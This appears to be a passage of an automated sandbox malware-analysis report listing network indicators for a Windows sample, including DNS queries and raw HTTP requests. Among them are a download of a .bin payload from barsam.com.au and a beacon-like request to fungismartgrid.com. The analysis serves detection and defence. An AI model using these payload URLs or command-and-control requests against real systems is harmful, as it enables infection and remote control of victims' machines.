3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: aSsc9zh1ex.exe, 00000007.00000003.42236588929.0000000001AFF000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42242910280.0000000001AFF000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42242442398.0000000001AB8000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.42236524676.0000000001AFA000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42242846036.0000000001AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://barsam.com.au/bin_QuCucbUMda229.bin
        Source: aSsc9zh1ex.exe, 00000007.00000003.42236524676.0000000001AFA000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42242846036.0000000001AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://barsam.com.au/bin_QuCucbUMda229.bin?
        Source: aSsc9zh1ex.exe, 00000007.00000003.42236524676.0000000001AFA000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42242846036.0000000001AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://barsam.com.au/bin_QuCucbUMda229.bing
        Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
        Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
        Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.drString found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
        Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
        Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.drString found in binary or memory: http://crl.globalsign.com/root.crl0G
        Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, wxbase30u_xml_gcc_custom.dll.1.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
        Source: explorer.exe, 0000000A.00000000.42004108195.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41939086451.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42073133985.0000000012015000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.d
        Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
        Source: explorer.exe, 0000000A.00000000.41901090373.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42027345774.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42004108195.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41939086451.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41961022334.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42073133985.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42161443792.0000000001414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
        Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
        Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
        Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, wxbase30u_xml_gcc_custom.dll.1.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
        Source: aSsc9zh1ex.exe, 00000007.00000001.41771865753.0000000000649000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: aSsc9zh1ex.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: explorer.exe, 0000000A.00000000.41901090373.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42027345774.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42004108195.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41939086451.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41961022334.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42073133985.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42161443792.0000000001414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
        Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
        Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.drString found in binary or memory: http://ocsp.digicert.com0O
        Source: explorer.exe, 0000000A.00000000.42047983869.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41981155267.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41918189807.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42181278199.000000000A05A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
        Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
        Source: explorer.exe, 0000000A.00000000.41998807854.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42066445764.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42004108195.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41939086451.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42073133985.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41934113235.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42199227042.000000000DEF2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
        Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, wxbase30u_xml_gcc_custom.dll.1.drString found in binary or memory: http://ocsp.sectigo.com0
        Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.drString found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
        Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
        Source: explorer.exe, 0000000A.00000000.42052359302.000000000ACF0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.42166284768.0000000003850000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.42185468524.000000000B590000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
        Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
        Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.drString found in binary or memory: http://www.digicert.com/CPS0
        Source: explorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
        Source: aSsc9zh1ex.exe, 00000007.00000001.41771865753.0000000000649000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: aSsc9zh1ex.exe, 00000007.00000001.41771391088.0000000000626000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: aSsc9zh1ex.exe, 00000007.00000001.41771153921.00000000005F2000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: aSsc9zh1ex.exe, 00000007.00000001.41771153921.00000000005F2000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: explorer.exe, 0000000A.00000000.41990992711.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42191069122.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42059179230.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41926696526.000000000D8A3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppe
        Source: explorer.exe, 0000000A.00000000.41990992711.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42191069122.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42059179230.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41926696526.000000000D8A3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppf
        Source: explorer.exe, 0000000A.00000000.42179312068.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42045949185.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41916352446.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41979204276.0000000009ECA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmO
        Source: explorer.exe, 0000000A.00000000.41901090373.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42027345774.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42179312068.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42045949185.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41961022334.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41916352446.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42161443792.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41979204276.0000000009ECA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
        Source: explorer.exe, 0000000A.00000000.42179312068.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42045949185.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41916352446.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41979204276.0000000009ECA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSG
        Source: explorer.exe, 0000000A.00000000.42058504298.000000000D826000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
        Source: explorer.exe, 0000000A.00000000.41998807854.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42066445764.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41934113235.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42199227042.000000000DEF2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 0000000A.00000000.42071929978.0000000011F59000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42003053261.0000000011F59000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41937972149.0000000011F59000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42204206643.0000000011F59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
        Source: explorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
        Source: explorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: explorer.exe, 0000000A.00000000.41928581843.000000000DA0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41992887926.000000000DA0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42192948449.000000000DA0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42061047062.000000000DA0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?Microsoft
        Source: explorer.exe, 0000000A.00000000.42047983869.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41981155267.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41918189807.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42181278199.000000000A05A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
        Source: explorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
        Source: explorer.exe, 0000000A.00000000.42047983869.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41981155267.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41998807854.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41918189807.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42066445764.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42181278199.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41934113235.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42199227042.000000000DEF2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
        Source: aSsc9zh1ex.exe, 00000007.00000001.41771865753.0000000000649000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: explorer.exe, 0000000A.00000000.42047983869.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41981155267.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41998807854.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41918189807.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42066445764.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42181278199.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41934113235.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42199227042.000000000DEF2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
        Source: explorer.exe, 0000000A.00000000.41990992711.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42191069122.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42059179230.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41926696526.000000000D8A3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comeu
        Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, wxbase30u_xml_gcc_custom.dll.1.drString found in binary or memory: https://sectigo.com/CPS0C
        Source: explorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell
        Source: explorer.exe, 0000000A.00000000.42178218225.0000000009E02000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42044824183.0000000009E02000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41977721414.0000000009E02000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41915362691.0000000009E02000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/).dlll
        Source: explorer.exe, 0000000A.00000000.42047983869.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41981155267.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41918189807.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42181278199.000000000A05A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
        Source: explorer.exe, 0000000A.00000000.41998807854.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42066445764.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41934113235.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42199227042.000000000DEF2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com-C
        Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, explorer.exe, 0000000A.00000000.41937498865.0000000011EA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41901090373.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42033280306.000000000390E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42002519017.0000000011EA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42027345774.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41961022334.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42161443792.0000000001414000.00000004.00000020.00020000.00000000.sdmp, AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
        Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.drString found in binary or memory: https://www.globalsign.com/repository/0
        Source: explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/music/celebrity/the-voice-ariana-grande-and-john-legend-walk-off-when-blak
        Source: explorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
        Source: explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/graham-tries-t
        Source: explorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
        Source: explorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
        Source: explorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
        Source: explorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
        Source: unknownDNS traffic detected: queries for: barsam.com.au
        Source: global trafficHTTP traffic detected: GET /bin_QuCucbUMda229.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: barsam.com.auCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /wn19/?jZf=NS202dJbEEETcB12VfvBfMMdjzaMJ2P7TP19ar/APX8BBmPLqx20W3tmhoszgkcRlb4O&1biX=C2MPnN HTTP/1.1Host: www.fungismartgrid.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
